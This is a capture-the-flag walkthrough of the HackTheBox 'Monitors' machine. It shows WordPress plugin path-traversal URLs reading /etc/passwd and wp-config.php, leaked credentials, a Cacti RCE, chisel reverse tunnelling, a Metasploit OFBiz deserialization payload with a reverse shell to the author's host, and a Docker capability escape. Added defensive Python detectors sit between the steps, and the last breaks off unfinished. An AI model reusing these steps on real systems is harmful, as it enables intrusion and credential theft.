HackTheBox: Monitors


Foothold:

Started by enumerating ports:

[*] OS based on TTL
Linux
[*] TCP Scan
Open ports: 22,80
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ba:cc:cd:81:fc:91:55:f3:f6:a9:1f:4e:e8:be:e5:2e (RSA)
|   256 69:43:37:6a:18:09:f5:e7:7a:67:b8:18:11:ea:d7:65 (ECDSA)
|_  256 5d:5e:3f:67:ef:7d:76:23:15:11:4b:53:f8:41:3a:94 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
[*] Execution time:
         TTL: 0
         Furious: 14
         Nmap: 9
         Total: 23

So let's have a look at what the page has:
Web interface

From that we know it is running WordPress and that there is a user named admin, so I used wpscan to check the site:

[jusepe@nix:~/Documents/HackTheBox/Machines/Monitors]$ wpscan --url http://monitors.htb
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.17
                               
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] Updating the Database ...
[i] Update completed.

[+] URL: http://monitors.htb/ [10.10.10.238]
[+] Started: Sat May  1 04:35:29 2021

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://monitors.htb/xmlrpc.php
 | Found By: Link Tag (Passive Detection)
 | Confidence: 100%
 | Confirmed By: Direct Access (Aggressive Detection), 100% confidence
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://monitors.htb/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://monitors.htb/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://monitors.htb/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.5.1 identified (Insecure, released on 2020-09-01).
 | Found By: Rss Generator (Passive Detection)
 |  - http://monitors.htb/index.php/feed/, <generator>https://wordpress.org/?v=5.5.1</generator>
 |  - http://monitors.htb/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.5.1</generator>

[+] WordPress theme in use: iconic-one
 | Location: http://monitors.htb/wp-content/themes/iconic-one/
 | Last Updated: 2020-12-24T00:00:00.000Z
 | Readme: http://monitors.htb/wp-content/themes/iconic-one/readme.txt
 | [!] The version is out of date, the latest version is 2.1.9
 | Style URL: http://monitors.htb/wp-content/themes/iconic-one/style.css?ver=1.7.8
 | Style Name: Iconic One
 | Style URI: https://themonic.com/iconic-one/
 | Description: Iconic One is a premium quality theme with pixel perfect typography and responsiveness and is built ...
 | Author: Themonic
 | Author URI: https://themonic.com
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 2.1.7 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://monitors.htb/wp-content/themes/iconic-one/style.css?ver=1.7.8, Match: 'Version: 2.1.7'

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] wp-with-spritz
 | Location: http://monitors.htb/wp-content/plugins/wp-with-spritz/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2015-08-20T20:15:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 4.2.4 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://monitors.htb/wp-content/plugins/wp-with-spritz/readme.txt

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:01 <===============================================================================================================================================================================================================================================> (137 / 137) 100.00% Time: 00:00:01

[i] No Config Backups Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sat May  1 04:35:36 2021
[+] Requests Done: 188
[+] Cached Requests: 5
[+] Data Sent: 45.306 KB
[+] Data Received: 16.562 MB
[+] Memory used: 203.707 MB
[+] Elapsed time: 00:00:07

It is using the plugin wp-with-spritz, which apparently was last updated in 2015, so it may be vulnerable. A quick search in Google points to an exploit:

Used Panoptic:

[jusepe@nix:~/Documents/HackTheBox/Machines/Monitors][0]$ panoptic.py -u "http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd" --param url --os '*NIX'

 .-',--.`-.
<_ | () | _>
  `-`=='-'

Panoptic v0.1 (https://github.com/lightos/Panoptic/)

[i] Starting scan at: 11:40:47

[i] Checking original response...
[i] Checking invalid response...
[i] Done!
[i] Searching for files...
[i] Possible file(s) found!
[i] OS: *NIX
[+] Found '/etc/mysql/my.cnf' (*NIX/Databases/conf).
[+] Found '/etc/apache2/apache2.conf' (*NIX/HTTP server/conf).
[+] Found '/etc/apache2/ports.conf' (*NIX/HTTP server/conf).
[+] Found '/etc/apache2/envvars' (*NIX/HTTP server/conf).
[+] Found '/etc/apache2/mods-available/autoindex.conf' (*NIX/HTTP server/conf).
[+] Found '/etc/apache2/mods-available/deflate.conf' (*NIX/HTTP server/conf).
[+] Found '/etc/apache2/mods-available/dir.conf' (*NIX/HTTP server/conf).
[+] Found '/etc/apache2/mods-available/mime.conf' (*NIX/HTTP server/conf).
[+] Found '/etc/apache2/mods-available/proxy.conf' (*NIX/HTTP server/conf).
[+] Found '/etc/apache2/mods-available/setenvif.conf' (*NIX/HTTP server/conf).
[+] Found '/etc/apache2/mods-available/ssl.conf' (*NIX/HTTP server/conf).
[+] Found '/etc/apache2/mods-enabled/alias.conf' (*NIX/HTTP server/conf).
[+] Found '/etc/apache2/mods-enabled/deflate.conf' (*NIX/HTTP server/conf).
[+] Found '/etc/apache2/mods-enabled/dir.conf' (*NIX/HTTP server/conf).
[+] Found '/etc/apache2/mods-enabled/mime.conf' (*NIX/HTTP server/conf).
[+] Found '/etc/apache2/mods-enabled/negotiation.conf' (*NIX/HTTP server/conf).
[+] Found '/etc/apache2/mods-enabled/status.conf' (*NIX/HTTP server/conf).
[+] Found '/etc/dhcp/dhclient.conf' (*NIX/Network/conf).
[+] Found '/proc/self/mounts' (*NIX/other).
[+] Found '/proc/self/stat' (*NIX/other).
[+] Found '/proc/self/status' (*NIX/other).
[+] Found '/proc/self/cmdline' (*NIX/other).
[+] Found '/proc/self/fd/10' (*NIX/other).

It ended up not showing any useful file except for /proc/self/fd/10, which shows some logs, but I couldn't figure out how to use them.

Kept trying with manual enumeration and found two interesting files:

  • The Apache default site configuration (monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../../etc/apache2/sites-available/000-default.conf), which points to a different configuration file (monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../../etc/apache2/sites-available/cacti-admin.monitors.htb.conf); this led to the virtual host of a different web service (cacti-admin.monitors.htb).
  • The WordPress configuration file (monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../../var/www/wordpress/wp-config.php), which has the database username and password in it (wpadmin:BestAdministrator@2020!).
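The requests above are what a traversal through the plugin's url= parameter looks like from the server side. As an added example (my code, not from the write-up), the scanner below reads Apache access-log lines and flags query parameters that contain a traversal sequence after full decoding, so it catches the plain form, the doubled-slash form used above, and double-percent-encoded variants. The log lines are constructed; only the request path mirrors the plugin URL seen on this page.

```python
"""Flag directory-traversal attempts in Apache access-log lines.

Added example (not from the write-up). The log lines below are constructed;
the request path mirrors the wp-with-spritz `url=` parameter seen above.
"""
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Apache combined log format; only the fields we need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# A ".." path component, checked after decoding and slash normalisation.
TRAVERSAL_RE = re.compile(r'(^|/)\.\.(/|$)')


def decode_fully(value, rounds=3):
    """Undo up to `rounds` layers of percent-encoding (handles %252e%252e)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def normalise(path):
    """Collapse repeated slashes so '..//etc' and '../etc' look alike."""
    return re.sub(r'/+', '/', path.replace('\\', '/'))


def traversal_params(target):
    """Return (param, decoded value) pairs of a request target whose value
    contains a traversal sequence; empty list when the request is clean."""
    parts = urlsplit(target)
    hits = []
    for key, raw in parse_qsl(parts.query, keep_blank_values=True):
        value = normalise(decode_fully(raw))
        if TRAVERSAL_RE.search(value):
            hits.append((key, value))
    return hits


def scan_log(lines):
    """One finding dict per log line that carries a traversal attempt."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = traversal_params(m.group('target'))
        if hits:
            findings.append({
                'ip': m.group('ip'),
                'path': urlsplit(m.group('target')).path,
                'params': hits,
                'status': int(m.group('status')),
            })
    return findings


# Constructed sample log: one benign request, then three traversal attempts
# (plain, doubled slash as in the write-up, and double-percent-encoded).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/May/2021:11:40:47 +0000] "GET /wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=https://example.org/a.html HTTP/1.1" 200 5120',
    '10.0.0.9 - - [01/May/2021:11:40:48 +0000] "GET /wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../../etc/passwd HTTP/1.1" 200 2313',
    '10.0.0.9 - - [01/May/2021:11:40:49 +0000] "GET /wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd HTTP/1.1" 200 2313',
    '10.0.0.9 - - [01/May/2021:11:40:50 +0000] "GET /wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=%252e%252e%252f%252e%252e%252fetc%252fhostname HTTP/1.1" 200 17',
]

if __name__ == '__main__':
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['path']} {f['params']} -> {f['status']}")
```

A 200 response with a non-trivial body on one of these requests is the signal worth alerting on: it means the file was served, not just requested.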

Before anything else, I tried to log in to WordPress with those credentials, but it didn't work.

Then I checked what is inside the new vhost:
Cacti

Apparently it is using the Cacti CMS, which seems to have some vulnerabilities according to exploitdb:

[jusepe@nix:~/Documents/HackTheBox/Machines/Monitors][0]$ searchsploit cacti
----------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                     |  Path
----------------------------------------------------------------------------------- ---------------------------------
Cacti - 'graph_view.php' Remote Command Execution (Metasploit)                     | php/webapps/16881.rb
Cacti 0.8.6-d - 'graph_view.php' Command Injection (Metasploit)                    | php/webapps/9911.rb
Cacti 0.8.6d - Remote Command Execution                                            | php/webapps/1062.pl
Cacti 0.8.6i - 'cmd.php?popen()' Remote Injection                                  | php/webapps/3029.php
Cacti 0.8.6i - 'copy_cacti_user.php' SQL Injection Create Admin                    | php/webapps/3045.php
Cacti 0.8.7 (RedHat High Performance Computing [HPC]) - 'utilities.php?Filter' Cro | php/webapps/34504.txt
Cacti 0.8.7 - '/index.php/sql.php?Login Action login_username' SQL Injection       | php/webapps/31161.txt
Cacti 0.8.7 - 'data_input.php' Cross-Site Scripting                                | php/webapps/33000.txt
Cacti 0.8.7 - 'graph.php?view_type' Cross-Site Scripting                           | php/webapps/31157.txt
Cacti 0.8.7 - 'graph_view.php?filter' Cross-Site Scripting                         | php/webapps/31158.txt
Cacti 0.8.7 - 'graph_view.php?graph_list' SQL Injection                            | php/webapps/31156.txt
Cacti 0.8.7 - 'graph_xport.php?local_graph_id' SQL Injection                       | php/webapps/31160.txt
Cacti 0.8.7 - 'tree.php' Multiple SQL Injections                                   | php/webapps/31159.txt
Cacti 0.8.7e - Multiple Vulnerabilities                                            | php/webapps/10234.txt
Cacti 0.8.7e - OS Command Injection                                                | php/webapps/12339.txt
Cacti 0.8.7e - SQL Injection                                                       | php/webapps/12338.txt
Cacti 0.8.x - 'graph.php' Multiple Cross-Site Scripting Vulnerabilities            | php/webapps/33374.txt
Cacti 1.2.12 - 'filter' SQL Injection / Remote Code Execution                      | php/webapps/49810.py
Cacti 1.2.8 - Authenticated Remote Code Execution                                  | multiple/webapps/48144.py
Cacti 1.2.8 - Remote Code Execution                                                | php/webapps/48128.py
Cacti 1.2.8 - Unauthenticated Remote Code Execution                                | multiple/webapps/48145.py
Cacti Superlinks Plugin 1.4-2 - SQL Injection                                      | php/webapps/33809.txt
Cacti Superlinks Plugin 1.4-2 - SQL Injection / Local File Inclusion               | php/webapps/35578.sh
Cacti v1.2.8 - Unauthenticated Remote Code Execution (Metasploit)                  | php/webapps/48159.rb
RaXnet Cacti 0.5/0.6.x/0.8.x - 'Graph_Image.php' Remote Command Execution Variant  | php/webapps/25927.pl
RaXnet Cacti 0.5/0.6/0.8 - 'Config_Settings.php' Remote File Inclusion             | php/webapps/25857.txt
RaXnet Cacti 0.5/0.6/0.8 - 'Top_Graph_Header.php' Remote File Inclusion            | php/webapps/25859.txt
RaXnet Cacti 0.6.x/0.8.x - 'Auth_Login.php' SQL Injection                          | php/webapps/24375.txt
----------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

For that version there is an authenticated RCE, so I tried to authenticate with the credentials from the WordPress configuration, which worked just fine; I only needed to change the username to admin (admin:BestAdministrator@2020!):

Used this exploit from github to get a shell.

That exploit is almost identical to the one on exploitdb. However, the exploitdb one wasn't working because it wasn't encoding the spaces.

User

At first I thought that I needed to crack the password for the WordPress user; here is how I got the hash (inside the WordPress database):

mysql> select user_login,user_nicename, display_name,user_pass from wp_users;
+------------+---------------+--------------+------------------------------------+
| user_login | user_nicename | display_name | user_pass                          |
+------------+---------------+--------------+------------------------------------+
| admin      | admin         | admin        | $P$Be7cx.OsLozVI5L6DD60LLZNoHW9dZ0 |
+------------+---------------+--------------+------------------------------------+
1 row in set (0.00 sec)

After some time with colabcat I wasn't able to break it, so this may be a rabbit hole.

There is another user, and in his home directory there is an interesting script, found after guessing the file name (/home/marcus/.backup/backup.sh), which has the user's credentials:

#!/bin/bash

backup_name="cacti_backup"
config_pass="VerticalEdge2020"

zip /tmp/${backup_name}.zip /usr/share/cacti/cacti/*
sshpass -p "${config_pass}" scp /tmp/${backup_name} 192.168.1.14:/opt/backup_collection/${backup_name}.zip
rm /tmp/${backup_name}.zip

This step isn't necessary; in fact, I found the script after getting root, without getting the user first.

Root

Used netstat to check which ports are open; surprisingly, port 8443 was listening only on localhost, and it is a port usually used by web services.
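The netstat check above is worth making repeatable: services bound only to loopback are exactly the ones a compromised host exposes through a port forward, so they need the same authentication and patch level as anything facing the network. As an added example (my code, not from the write-up), the parser below reads netstat -tlnp output, classifies each listener by bind scope, and lists the ports that are reachable only via loopback. The netstat output is constructed to resemble the target's 127.0.0.1:8443 listener.

```python
"""Classify TCP listeners from `netstat -tlnp` output by bind scope.

Added example, not from the write-up; the netstat text below is constructed.
"""
import ipaddress


def split_host_port(local_address):
    """'127.0.0.1:8443' -> ('127.0.0.1', 8443); ':::80' -> ('::', 80)."""
    host, _, port = local_address.rpartition(':')
    return host, int(port)


def bind_scope(host):
    """'all' for a wildcard bind, 'loopback' for 127.x / ::1, else 'specific'."""
    addr = ipaddress.ip_address(host)
    if addr.is_unspecified:
        return 'all'
    if addr.is_loopback:
        return 'loopback'
    return 'specific'


def parse_listeners(netstat_output):
    """Return one dict per LISTEN row: proto, host, port, scope, program."""
    listeners = []
    for line in netstat_output.splitlines():
        fields = line.split()
        # Header and non-TCP rows are skipped; only LISTEN sockets matter here.
        if len(fields) < 6 or not fields[0].startswith('tcp') or fields[5] != 'LISTEN':
            continue
        host, port = split_host_port(fields[3])
        listeners.append({
            'proto': fields[0],
            'host': host,
            'port': port,
            'scope': bind_scope(host),
            'program': fields[6] if len(fields) > 6 else '-',
        })
    return listeners


def loopback_only_ports(netstat_output):
    """Ports bound to loopback and to nothing else; a port forward from the
    host would expose exactly these to the outside."""
    scopes_by_port = {}
    for entry in parse_listeners(netstat_output):
        scopes_by_port.setdefault(entry['port'], set()).add(entry['scope'])
    return sorted(p for p, scopes in scopes_by_port.items() if scopes == {'loopback'})


# Constructed sample in `netstat -tlnp` layout.
SAMPLE_NETSTAT = """\
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:8443          0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      1042/mysqld
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -
tcp6       0      0 :::22                   :::*                    LISTEN      -
"""

if __name__ == '__main__':
    for entry in parse_listeners(SAMPLE_NETSTAT):
        print(f"{entry['proto']:5} {entry['host']}:{entry['port']} {entry['scope']} {entry['program']}")
    print('loopback-only:', loopback_only_ports(SAMPLE_NETSTAT))
```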

Used chisel to forward the port to my local host, following this guide.

So the first step was to run chisel on my host:

./chisel server -p 9000 -reverse

Then on the target we forward port 8443 to port 8443 on our host:

./chisel client 10.10.15.193:9000 R:8443:127.0.0.1:8443

Remember to transfer the chisel binary to the target first.

Now we can test whether we have access to the service:
Apache

So I used ffuf to check if there is any hidden directory and quickly got some results that redirected me to the login endpoint:

[jusepe@nix:~][0]$ ffuf -c -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u https://127.0.0.1:8443/FUZZ

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : https://127.0.0.1:8443/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________

images                  [Status: 302, Size: 0, Words: 1, Lines: 1]
content                 [Status: 302, Size: 0, Words: 1, Lines: 1]
common                  [Status: 302, Size: 0, Words: 1, Lines: 1]
catalog                 [Status: 302, Size: 0, Words: 1, Lines: 1]
marketing               [Status: 302, Size: 0, Words: 1, Lines: 1]
ecommerce               [Status: 302, Size: 0, Words: 1, Lines: 1]
ap                      [Status: 302, Size: 0, Words: 1, Lines: 1]

We get redirected to a login page (which also displays 17.12.0.1 as the current release):

OFBiz

As always, I searched for available exploits:

[jusepe@nix:~/Documents/HackTheBox/Machines/Monitors/CVE-2021-29200][1]$ searchsploit ofbiz
------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                      |  Path
------------------------------------------------------------------------------------ ---------------------------------
Apache OFBiz - Admin Creator                                                        | multiple/remote/12264.txt
Apache OFBiz - Multiple Cross-Site Scripting Vulnerabilities                        | php/webapps/12330.txt
Apache OFBiz - Remote Execution (via SQL Execution)                                 | multiple/remote/12263.txt
Apache OFBiz 10.4.x - Multiple Cross-Site Scripting Vulnerabilities                 | multiple/remote/38230.txt
Apache OFBiz 16.11.04 - XML External Entity Injection                               | java/webapps/45673.py
Apache OFBiz 16.11.05 - Cross-Site Scripting                                        | multiple/webapps/45975.txt
Apache OFBiz 17.12.03 - Cross-Site Request Forgery (Account Takeover)               | java/webapps/48408.txt
------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

None of those worked, so I kept searching until I tried out the Metasploit modules:

msf6 > search ofbiz

Matching Modules
================

   #  Name                                                  Disclosure Date  Rank       Check  Description
   -  ----                                                  ---------------  ----       -----  -----------
   0  exploit/linux/http/apache_ofbiz_deserialization_soap  2021-03-22       excellent  Yes    Apache OFBiz SOAP Java Deserialization
   1  exploit/linux/http/apache_ofbiz_deserialization       2020-07-13       excellent  Yes    Apache OFBiz XML-RPC Java Deserialization


Interact with a module by name or index. For example info 1, use 1 or use exploit/linux/http/apache_ofbiz_deserialization

I used the first module since it was more recent, but after some time trying I didn't manage to make it work.

Finally used exploit/linux/http/apache_ofbiz_deserialization to get the root shell:

This is how I configured the module:

msf6 exploit(linux/http/apache_ofbiz_deserialization) > show options

Module options (exploit/linux/http/apache_ofbiz_deserialization):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     127.0.0.1        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      8443             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to liste
                                         n on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base path
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (linux/x64/meterpreter_reverse_https):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.15.193     yes       The local listener hostname
   LPORT  8181             yes       The local listener port
   LURI                    no        The HTTP Path


Exploit target:

   Id  Name
   --  ----
   1   Linux Dropper

For some reason the automatic check reports that the target isn't vulnerable, but if I force it (ForceExploit) the exploit works just fine:

msf6 exploit(linux/http/apache_ofbiz_deserialization) > exploit

[*] Executing automatic check (disable AutoCheck to override)
[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. Target cannot deserialize arbitrary data. Enable ForceExploit to override check result.
[*] Exploit completed, but no session was created.

Docker escape

We can tell that we are inside a Docker container with the following commands:

(remote) root@fe5704311d80:/root# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
5: eth0@if6: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:ac:11:00:02 brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet 172.17.0.2/16 brd 172.17.255.255 scope global eth0
       valid_lft forever preferred_lft forever
(remote) root@fe5704311d80:/root# cat /proc/1/cgroup
12:pids:/docker/fe5704311d80bf9e3eb1a004be499189a69288a25a885928d529369893cc147b
11:net_cls,net_prio:/docker/fe5704311d80bf9e3eb1a004be499189a69288a25a885928d529369893cc147b
10:blkio:/docker/fe5704311d80bf9e3eb1a004be499189a69288a25a885928d529369893cc147b
9:rdma:/
8:memory:/docker/fe5704311d80bf9e3eb1a004be499189a69288a25a885928d529369893cc147b
7:freezer:/docker/fe5704311d80bf9e3eb1a004be499189a69288a25a885928d529369893cc147b
6:hugetlb:/docker/fe5704311d80bf9e3eb1a004be499189a69288a25a885928d529369893cc147b
5:devices:/docker/fe5704311d80bf9e3eb1a004be499189a69288a25a885928d529369893cc147b
4:cpuset:/docker/fe5704311d80bf9e3eb1a004be499189a69288a25a885928d529369893cc147b
3:perf_event:/docker/fe5704311d80bf9e3eb1a004be499189a69288a25a885928d529369893cc147b
2:cpu,cpuacct:/docker/fe5704311d80bf9e3eb1a004be499189a69288a25a885928d529369893cc147b
1:name=systemd:/docker/fe5704311d80bf9e3eb1a004be499189a69288a25a885928d529369893cc147b
0::/system.slice/containerd.service

Found this first post that explains a way of escaping Docker containers. However, running ip link add dummy0 type dummy returns an error, so it can't be exploited this way.

After some time searching for other ways of breaking out of the container I found this post. Following the steps of the guide, first we check that we have the needed capability (cap_sys_module):

(remote) root@fe5704311d80:/root# capsh --print
Current: = cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_module,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap+eip
Bounding set =cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_module,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap
Securebits: 00/0x0/1'b0
 secure-noroot: no (unlocked)
 secure-no-suid-fixup: no (unlocked)
 secure-keep-caps: no (unlocked)
uid=0(root)
gid=0(root)
groups=
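The two checks above, the cgroup inspection and capsh --print, are what a container hardening review automates. As an added example (my code, not from the write-up), the script below extracts the container id from cgroup text, parses the capability set either from the capsh "Current:" line or from the CapEff bitmask in /proc/<pid>/status, and reports the capabilities that give a root process in the container a route to the host kernel, cap_sys_module among them, which is what makes the module-loading escape below possible. The cgroup and capsh samples are copied from the output above; the CapEff hex value is constructed to match them.

```python
"""Container posture check: container id, effective capabilities and the
subset that lets a root process in the container reach the host kernel.

Added example, not code from the write-up. Samples are taken from the output
shown above (cgroup, capsh) or constructed (CapEff).
"""
import re

# Linux capability names indexed by bit number (include/uapi/linux/capability.h).
CAP_NAMES = [
    'cap_chown', 'cap_dac_override', 'cap_dac_read_search', 'cap_fowner',
    'cap_fsetid', 'cap_kill', 'cap_setgid', 'cap_setuid', 'cap_setpcap',
    'cap_linux_immutable', 'cap_net_bind_service', 'cap_net_broadcast',
    'cap_net_admin', 'cap_net_raw', 'cap_ipc_lock', 'cap_ipc_owner',
    'cap_sys_module', 'cap_sys_rawio', 'cap_sys_chroot', 'cap_sys_ptrace',
    'cap_sys_pacct', 'cap_sys_admin', 'cap_sys_boot', 'cap_sys_nice',
    'cap_sys_resource', 'cap_sys_time', 'cap_sys_tty_config', 'cap_mknod',
    'cap_lease', 'cap_audit_write', 'cap_audit_control', 'cap_setfcap',
    'cap_mac_override', 'cap_mac_admin', 'cap_syslog', 'cap_wake_alarm',
    'cap_block_suspend', 'cap_audit_read', 'cap_perfmon', 'cap_bpf',
    'cap_checkpoint_restore',
]

# Not in Docker's default set; each gives root in the container a path to the host.
HOST_REACHING = {
    'cap_sys_module': 'load kernel modules into the shared host kernel',
    'cap_sys_admin': 'mount filesystems, manipulate namespaces and cgroups',
    'cap_sys_ptrace': 'trace host processes if the pid namespace is shared',
    'cap_sys_rawio': 'raw access to block devices and /dev/mem',
    'cap_dac_read_search': 'bypass read permission checks on host files',
    'cap_net_admin': 'reconfigure networking if the net namespace is shared',
    'cap_bpf': 'load BPF programs into the host kernel',
}

CGROUP_LINE_RE = re.compile(r'^(\d+):([^:]*):(.*)$')        # v1 "id:ctrl:path", v2 "0::path"
CONTAINER_ID_RE = re.compile(r'/docker[/-]([0-9a-f]{64})')  # /docker/<id> or docker-<id>.scope


def container_id_from_cgroup(text):
    """Return the 64-hex Docker container id named in cgroup text, or None."""
    for line in text.splitlines():
        m = CGROUP_LINE_RE.match(line)
        if m:
            found = CONTAINER_ID_RE.search(m.group(3))
            if found:
                return found.group(1)
    return None


def caps_from_capsh(text):
    """Parse the 'Current:' line of `capsh --print` into a set of cap names.
    Tokens look like 'cap_a,cap_b+eip'; a bare '=ep' means every capability."""
    caps = set()
    for line in text.splitlines():
        if not line.startswith('Current:'):
            continue
        for token in line[len('Current:'):].split():
            m = re.match(r'^([a-z0-9_,]*)([+\-=])?([eip]*)$', token)
            if not m:
                continue
            names, op, flags = m.groups()
            if names == '' and flags == '':
                continue                        # a bare '=' clears the set
            chosen = set(CAP_NAMES) if names == '' else set(names.split(','))
            caps = caps - chosen if op == '-' else caps | chosen
    return caps


def caps_from_capeff(hex_mask):
    """Decode the CapEff bitmask from /proc/<pid>/status into cap names."""
    mask = int(hex_mask, 16)
    return {name for bit, name in enumerate(CAP_NAMES) if mask >> bit & 1}


def host_reaching_caps(caps):
    """Sorted subset of `caps` that offers a route to the host kernel."""
    return sorted(set(caps) & set(HOST_REACHING))


def assess(cgroup_text, capsh_text):
    caps = caps_from_capsh(capsh_text)
    return {
        'container_id': container_id_from_cgroup(cgroup_text),
        'capability_count': len(caps),
        'host_reaching': host_reaching_caps(caps),
    }


# Samples: cgroup and capsh lines as shown above; CapEff constructed to match them.
CGROUP_SAMPLE = """12:pids:/docker/fe5704311d80bf9e3eb1a004be499189a69288a25a885928d529369893cc147b
1:name=systemd:/docker/fe5704311d80bf9e3eb1a004be499189a69288a25a885928d529369893cc147b
0::/system.slice/containerd.service
"""
CAPSH_SAMPLE = ("Current: = cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,"
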